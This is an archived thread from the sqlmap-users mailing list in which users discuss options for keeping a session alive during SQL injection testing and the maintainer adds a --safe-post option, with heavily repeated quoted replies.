>                 --csrf-token=CSR..  Parameter used to hold anti-CSRF token
>                 --csrf-url=CSRFURL  URL address to visit to extract
>             anti-CSRF token
>
>             In case the csrf token needs to be refreshed for each
>             injection (when injecting into forms and other typical
>             POST injections and such).
>
>             On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry
>             <bpe...@gm...
>             <mailto:bpe...@gm...>> wrote:
>
>                 However, that being said, I have run into this before
>                 and had to write my own exploits to fully exploit the
>                 vulnerability.
>
>                 On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry
>                 <bpe...@gm...
>                 <mailto:bpe...@gm...>> wrote:
>
>                     There is a second order parameter, it could be
>                     used to perform this. It would be requested after
>                     ever injected request were sent.
>
>                     On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek
>                     <kr...@gm... <mailto:kr...@gm...>> wrote:
>
>                         Greetings,
>                         I am testing an application which I suspect to
>                         log me out if I don't
>                         send certain post request in certain time
>                         interval.
>                         Is this possible to do with Sqlmap? I know
>                         that there is a parameter
>                         which lets me to run any python code before
>                         every request. But it is not
>                         so nice, let's say.
>                         Is there any possibility to supply a post
>                         request to safeurl? Is there
>                         anything like this planed?
>                         Thank you very much,
>                         Vojta
>
>                         ------------------------------------------------------------------------------
>                         BPM Camp - Free Virtual Workshop May 6th at
>                         10am PDT/1PM EDT
>                         Develop your own process in accordance with
>                         the BPMN 2 standard
>                         Learn Process modeling best practices with
>                         Bonita BPM through live exercises
>                         http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>                         event?utm_
>                         source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>                         _______________________________________________
>                         sqlmap-users mailing list
>                         sql...@li...
>                         <mailto:sql...@li...>
>                         https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
>                     -- 
>                     http://volatile-minds.blogspot.com -- blog
>                     http://www.volatileminds.net -- website
>
>
>
>
>                 -- 
>                 http://volatile-minds.blogspot.com -- blog
>                 http://www.volatileminds.net -- website
>
>                 ------------------------------------------------------------------------------
>                 BPM Camp - Free Virtual Workshop May 6th at 10am
>                 PDT/1PM EDT
>                 Develop your own process in accordance with the BPMN 2
>                 standard
>                 Learn Process modeling best practices with Bonita BPM
>                 through live exercises
>                 http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>                 event?utm_
>                 source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>                 _______________________________________________
>                 sqlmap-users mailing list
>                 sql...@li...
>                 <mailto:sql...@li...>
>                 https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
>
>         -- 
>         http://volatile-minds.blogspot.com -- blog
>         http://www.volatileminds.net -- website
>
>         ------------------------------------------------------------------------------
>         BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>         Develop your own process in accordance with the BPMN 2 standard
>         Learn Process modeling best practices with Bonita BPM through
>         live exercises
>         http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>         event?utm_
>         source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>         _______________________________________________
>         sqlmap-users mailing list
>         sql...@li...
>         <mailto:sql...@li...>
>         https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
>     -- 
>     Miroslav Stampar
>     http://about.me/stamparm
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live exercises
> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] how to send post request as safeurl

[Miroslav S. <mir...@gm...>]

Done (usage e.g. --safe-url=... --safe-post="foo=bar&...").

Bye

On Mon, Apr 20, 2015 at 10:26 PM, Miroslav Stampar <
mir...@gm...> wrote:

> Pushing the patch in couple of hours.
>
> Bye
>
> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <bpe...@gm...>
> wrote:
>
>> Ah, good point. Hadn't thought about that. Also, requiring a POST request
>> does make it difficult.
>>
>> On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...>
>> wrote:
>>
>>> I dont think second order option will work as that is specifiing where
>>> to look for injection results, which might result in your underlying
>>> injection failing if the results are not to be found there.
>>>
>>> There is however options in latest version that appear to be for just
>>> this type of situation (although I personally haven't used them just yet):
>>>     --safe-url=SAFURL   URL address to visit frequently during testing
>>>     --safe-freq=SAFREQ  Test requests between two visits to a given safe
>>> URL
>>>
>>> I believe this will ensure your session remains active during scan.
>>>
>>> There is also the options for CSRF tokens to be snagged and parsed via:
>>>     --csrf-token=CSR..  Parameter used to hold anti-CSRF token
>>>     --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token
>>>
>>> In case the csrf token needs to be refreshed for each injection (when
>>> injecting into forms and other typical POST injections and such).
>>>
>>> On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry <
>>> bpe...@gm...> wrote:
>>>
>>>> However, that being said, I have run into this before and had to write
>>>> my own exploits to fully exploit the vulnerability.
>>>>
>>>> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry <
>>>> bpe...@gm...> wrote:
>>>>
>>>>> There is a second order parameter, it could be used to perform this.
>>>>> It would be requested after ever injected request were sent.
>>>>>
>>>>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...>
>>>>> wrote:
>>>>>
>>>>>> Greetings,
>>>>>> I am testing an application which I suspect to log me out if I don't
>>>>>> send certain post request in certain time interval.
>>>>>> Is this possible to do with Sqlmap? I know that there is a parameter
>>>>>> which lets me to run any python code before every request. But it is
>>>>>> not
>>>>>> so nice, let's say.
>>>>>> Is there any possibility to supply a post request to safeurl? Is there
>>>>>> anything like this planed?
>>>>>> Thank you very much,
>>>>>> Vojta
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>>>>> Develop your own process in accordance with the BPMN 2 standard
>>>>>> Learn Process modeling best practices with Bonita BPM through live
>>>>>> exercises
>>>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>>>>> event?utm_
>>>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website
>>>>>
>>>>
>>>>
>>>>
>>>> --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>>> Develop your own process in accordance with the BPMN 2 standard
>>>> Learn Process modeling best practices with Bonita BPM through live
>>>> exercises
>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>>> event?utm_
>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>
>>
>> --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>>
>> ------------------------------------------------------------------------------
>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>> Develop your own process in accordance with the BPMN 2 standard
>> Learn Process modeling best practices with Bonita BPM through live
>> exercises
>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>> event?utm_
>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>



-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] how to send post request as safeurl

[Vojtěch P. <kr...@gm...>]

Definitelly, thank you for your lightning response.
Vojta

On 20.4.2015 22:35, Miroslav Stampar wrote:
> --safe-post
>
> is it ok?
>
> On Mon, Apr 20, 2015 at 10:33 PM, Vojtěch Polášek <kr...@gm...
> <mailto:kr...@gm...>> wrote:
>
>     Okay, thanks and what is exactly going to be added?
>     Thanks,
>     Vojta
>
>
>     On 20.4.2015 22:26, Miroslav Stampar wrote:
>>     Pushing the patch in couple of hours.
>>
>>     Bye
>>
>>     On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry
>>     <bpe...@gm... <mailto:bpe...@gm...>> wrote:
>>
>>         Ah, good point. Hadn't thought about that. Also, requiring a
>>         POST request does make it difficult.
>>
>>         On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe
>>         <hoo...@gm... <mailto:hoo...@gm...>> wrote:
>>
>>             I dont think second order option will work as that is
>>             specifiing where to look for injection results, which
>>             might result in your underlying injection failing if the
>>             results are not to be found there.
>>
>>             There is however options in latest version that appear to
>>             be for just this type of situation (although I personally
>>             haven't used them just yet):
>>                 --safe-url=SAFURL   URL address to visit frequently
>>             during testing
>>                 --safe-freq=SAFREQ  Test requests between two visits
>>             to a given safe URL
>>
>>             I believe this will ensure your session remains active
>>             during scan.
>>
>>             There is also the options for CSRF tokens to be snagged
>>             and parsed via:
>>                 --csrf-token=CSR..  Parameter used to hold anti-CSRF
>>             token
>>                 --csrf-url=CSRFURL  URL address to visit to extract
>>             anti-CSRF token
>>
>>             In case the csrf token needs to be refreshed for each
>>             injection (when injecting into forms and other typical
>>             POST injections and such).
>>
>>             On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry
>>             <bpe...@gm...
>>             <mailto:bpe...@gm...>> wrote:
>>
>>                 However, that being said, I have run into this before
>>                 and had to write my own exploits to fully exploit the
>>                 vulnerability.
>>
>>                 On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry
>>                 <bpe...@gm...
>>                 <mailto:bpe...@gm...>> wrote:
>>
>>                     There is a second order parameter, it could be
>>                     used to perform this. It would be requested after
>>                     ever injected request were sent.
>>
>>                     On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek
>>                     <kr...@gm... <mailto:kr...@gm...>> wrote:
>>
>>                         Greetings,
>>                         I am testing an application which I suspect
>>                         to log me out if I don't
>>                         send certain post request in certain time
>>                         interval.
>>                         Is this possible to do with Sqlmap? I know
>>                         that there is a parameter
>>                         which lets me to run any python code before
>>                         every request. But it is not
>>                         so nice, let's say.
>>                         Is there any possibility to supply a post
>>                         request to safeurl? Is there
>>                         anything like this planed?
>>                         Thank you very much,
>>                         Vojta
>>
>>                         ------------------------------------------------------------------------------
>>                         BPM Camp - Free Virtual Workshop May 6th at
>>                         10am PDT/1PM EDT
>>                         Develop your own process in accordance with
>>                         the BPMN 2 standard
>>                         Learn Process modeling best practices with
>>                         Bonita BPM through live exercises
>>                         http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>                         event?utm_
>>                         source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>                         _______________________________________________
>>                         sqlmap-users mailing list
>>                         sql...@li...
>>                         <mailto:sql...@li...>
>>                         https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
>>                     -- 
>>                     http://volatile-minds.blogspot.com -- blog
>>                     http://www.volatileminds.net -- website
>>
>>
>>
>>
>>                 -- 
>>                 http://volatile-minds.blogspot.com -- blog
>>                 http://www.volatileminds.net -- website
>>
>>                 ------------------------------------------------------------------------------
>>                 BPM Camp - Free Virtual Workshop May 6th at 10am
>>                 PDT/1PM EDT
>>                 Develop your own process in accordance with the BPMN
>>                 2 standard
>>                 Learn Process modeling best practices with Bonita BPM
>>                 through live exercises
>>                 http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>                 event?utm_
>>                 source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>                 _______________________________________________
>>                 sqlmap-users mailing list
>>                 sql...@li...
>>                 <mailto:sql...@li...>
>>                 https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
>>
>>         -- 
>>         http://volatile-minds.blogspot.com -- blog
>>         http://www.volatileminds.net -- website
>>
>>         ------------------------------------------------------------------------------
>>         BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>         Develop your own process in accordance with the BPMN 2 standard
>>         Learn Process modeling best practices with Bonita BPM through
>>         live exercises
>>         http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>         event?utm_
>>         source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>         _______________________________________________
>>         sqlmap-users mailing list
>>         sql...@li...
>>         <mailto:sql...@li...>
>>         https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>>
>>
>>     -- 
>>     Miroslav Stampar
>>     http://about.me/stamparm
>>
>>
>>     ------------------------------------------------------------------------------
>>     BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>     Develop your own process in accordance with the BPMN 2 standard
>>     Learn Process modeling best practices with Bonita BPM through live exercises
>>     http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
>>     source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>
>>
>>     _______________________________________________
>>     sqlmap-users mailing list
>>     sql...@li... <mailto:sql...@li...>
>>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>     ------------------------------------------------------------------------------
>     BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>     Develop your own process in accordance with the BPMN 2 standard
>     Learn Process modeling best practices with Bonita BPM through live
>     exercises
>     http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>     event?utm_
>     source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>     _______________________________________________
>     sqlmap-users mailing list
>     sql...@li...
>     <mailto:sql...@li...>
>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm

Re: [sqlmap-users] how to send post request as safeurl

[Miroslav S. <mir...@gm...>]

--safe-post

is it ok?

On Mon, Apr 20, 2015 at 10:33 PM, Vojtěch Polášek <kr...@gm...> wrote:

>  Okay, thanks and what is exactly going to be added?
> Thanks,
> Vojta
>
>
> On 20.4.2015 22:26, Miroslav Stampar wrote:
>
>  Pushing the patch in couple of hours.
>
>  Bye
>
> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry <bpe...@gm...>
> wrote:
>
>> Ah, good point. Hadn't thought about that. Also, requiring a POST request
>> does make it difficult.
>>
>> On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe <hoo...@gm...>
>> wrote:
>>
>>>  I dont think second order option will work as that is specifiing where
>>> to look for injection results, which might result in your underlying
>>> injection failing if the results are not to be found there.
>>>
>>> There is however options in latest version that appear to be for just
>>> this type of situation (although I personally haven't used them just yet):
>>>     --safe-url=SAFURL   URL address to visit frequently during testing
>>>     --safe-freq=SAFREQ  Test requests between two visits to a given safe
>>> URL
>>>
>>>  I believe this will ensure your session remains active during scan.
>>>
>>> There is also the options for CSRF tokens to be snagged and parsed via:
>>>     --csrf-token=CSR..  Parameter used to hold anti-CSRF token
>>>     --csrf-url=CSRFURL  URL address to visit to extract anti-CSRF token
>>>
>>>  In case the csrf token needs to be refreshed for each injection (when
>>> injecting into forms and other typical POST injections and such).
>>>
>>> On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry <
>>> bpe...@gm...> wrote:
>>>
>>>> However, that being said, I have run into this before and had to write
>>>> my own exploits to fully exploit the vulnerability.
>>>>
>>>> On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry <
>>>> bpe...@gm...> wrote:
>>>>
>>>>> There is a second order parameter, it could be used to perform this.
>>>>> It would be requested after ever injected request were sent.
>>>>>
>>>>> On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek <kr...@gm...>
>>>>> wrote:
>>>>>
>>>>>> Greetings,
>>>>>> I am testing an application which I suspect to log me out if I don't
>>>>>> send certain post request in certain time interval.
>>>>>> Is this possible to do with Sqlmap? I know that there is a parameter
>>>>>> which lets me to run any python code before every request. But it is
>>>>>> not
>>>>>> so nice, let's say.
>>>>>> Is there any possibility to supply a post request to safeurl? Is there
>>>>>> anything like this planed?
>>>>>> Thank you very much,
>>>>>> Vojta
>>>>>>
>>>>>>
>>>>>> ------------------------------------------------------------------------------
>>>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>>>>> Develop your own process in accordance with the BPMN 2 standard
>>>>>> Learn Process modeling best practices with Bonita BPM through live
>>>>>> exercises
>>>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>>>>> event?utm_
>>>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>>>>> _______________________________________________
>>>>>> sqlmap-users mailing list
>>>>>> sql...@li...
>>>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>>>
>>>>>
>>>>>
>>>>>
>>>>>   --
>>>>> http://volatile-minds.blogspot.com -- blog
>>>>> http://www.volatileminds.net -- website
>>>>>
>>>>
>>>>
>>>>
>>>>  --
>>>> http://volatile-minds.blogspot.com -- blog
>>>> http://www.volatileminds.net -- website
>>>>
>>>>
>>>> ------------------------------------------------------------------------------
>>>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>>>> Develop your own process in accordance with the BPMN 2 standard
>>>> Learn Process modeling best practices with Bonita BPM through live
>>>> exercises
>>>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>>>> event?utm_
>>>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>>>> _______________________________________________
>>>> sqlmap-users mailing list
>>>> sql...@li...
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>>
>>>>
>>>
>>
>>
>>  --
>> http://volatile-minds.blogspot.com -- blog
>> http://www.volatileminds.net -- website
>>
>>
>> ------------------------------------------------------------------------------
>> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>> Develop your own process in accordance with the BPMN 2 standard
>> Learn Process modeling best practices with Bonita BPM through live
>> exercises
>> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>> event?utm_
>> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live exerciseshttp://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>
>
>
> _______________________________________________
> sqlmap-users mailing lis...@li...https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live
> exercises
> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
> event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

Re: [sqlmap-users] how to send post request as safeurl

[Vojtěch P. <kr...@gm...>]

Okay, thanks and what is exactly going to be added?
Thanks,
Vojta

On 20.4.2015 22:26, Miroslav Stampar wrote:
> Pushing the patch in couple of hours.
>
> Bye
>
> On Mon, Apr 20, 2015 at 8:37 PM, Brandon Perry
> <bpe...@gm... <mailto:bpe...@gm...>> wrote:
>
>     Ah, good point. Hadn't thought about that. Also, requiring a POST
>     request does make it difficult.
>
>     On Mon, Apr 20, 2015 at 1:36 PM, Johnathon Doe
>     <hoo...@gm... <mailto:hoo...@gm...>> wrote:
>
>         I dont think second order option will work as that is
>         specifiing where to look for injection results, which might
>         result in your underlying injection failing if the results are
>         not to be found there.
>
>         There is however options in latest version that appear to be
>         for just this type of situation (although I personally haven't
>         used them just yet):
>             --safe-url=SAFURL   URL address to visit frequently during
>         testing
>             --safe-freq=SAFREQ  Test requests between two visits to a
>         given safe URL
>
>         I believe this will ensure your session remains active during
>         scan.
>
>         There is also the options for CSRF tokens to be snagged and
>         parsed via:
>             --csrf-token=CSR..  Parameter used to hold anti-CSRF token
>             --csrf-url=CSRFURL  URL address to visit to extract
>         anti-CSRF token
>
>         In case the csrf token needs to be refreshed for each
>         injection (when injecting into forms and other typical POST
>         injections and such).
>
>         On Mon, Apr 20, 2015 at 1:22 PM, Brandon Perry
>         <bpe...@gm... <mailto:bpe...@gm...>>
>         wrote:
>
>             However, that being said, I have run into this before and
>             had to write my own exploits to fully exploit the
>             vulnerability.
>
>             On Mon, Apr 20, 2015 at 1:21 PM, Brandon Perry
>             <bpe...@gm...
>             <mailto:bpe...@gm...>> wrote:
>
>                 There is a second order parameter, it could be used to
>                 perform this. It would be requested after ever
>                 injected request were sent.
>
>                 On Mon, Apr 20, 2015 at 1:18 PM, Vojtěch Polášek
>                 <kr...@gm... <mailto:kr...@gm...>> wrote:
>
>                     Greetings,
>                     I am testing an application which I suspect to log
>                     me out if I don't
>                     send certain post request in certain time interval.
>                     Is this possible to do with Sqlmap? I know that
>                     there is a parameter
>                     which lets me to run any python code before every
>                     request. But it is not
>                     so nice, let's say.
>                     Is there any possibility to supply a post request
>                     to safeurl? Is there
>                     anything like this planed?
>                     Thank you very much,
>                     Vojta
>
>                     ------------------------------------------------------------------------------
>                     BPM Camp - Free Virtual Workshop May 6th at 10am
>                     PDT/1PM EDT
>                     Develop your own process in accordance with the
>                     BPMN 2 standard
>                     Learn Process modeling best practices with Bonita
>                     BPM through live exercises
>                     http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>                     event?utm_
>                     source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>                     _______________________________________________
>                     sqlmap-users mailing list
>                     sql...@li...
>                     <mailto:sql...@li...>
>                     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
>                 -- 
>                 http://volatile-minds.blogspot.com -- blog
>                 http://www.volatileminds.net -- website
>
>
>
>
>             -- 
>             http://volatile-minds.blogspot.com -- blog
>             http://www.volatileminds.net -- website
>
>             ------------------------------------------------------------------------------
>             BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>             Develop your own process in accordance with the BPMN 2
>             standard
>             Learn Process modeling best practices with Bonita BPM
>             through live exercises
>             http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>             event?utm_
>             source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>             _______________________________________________
>             sqlmap-users mailing list
>             sql...@li...
>             <mailto:sql...@li...>
>             https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
>
>     -- 
>     http://volatile-minds.blogspot.com -- blog
>     http://www.volatileminds.net -- website
>
>     ------------------------------------------------------------------------------
>     BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
>     Develop your own process in accordance with the BPMN 2 standard
>     Learn Process modeling best practices with Bonita BPM through live
>     exercises
>     http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual-
>     event?utm_
>     source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>     _______________________________________________
>     sqlmap-users mailing list
>     sql...@li...
>     <mailto:sql...@li...>
>     https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>
>
>
> -- 
> Miroslav Stampar
> http://about.me/stamparm
>
>
> ------------------------------------------------------------------------------
> BPM Camp - Free Virtual Workshop May 6th at 10am PDT/1PM EDT
> Develop your own process in accordance with the BPMN 2 standard
> Learn Process modeling best practices with Bonita BPM through live exercises
> http://www.bonitasoft.com/be-part-of-it/events/bpm-camp-virtual- event?utm_
> source=Sourceforge_BPM_Camp_5_6_15&utm_medium=email&utm_campaign=VA_SF
>
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users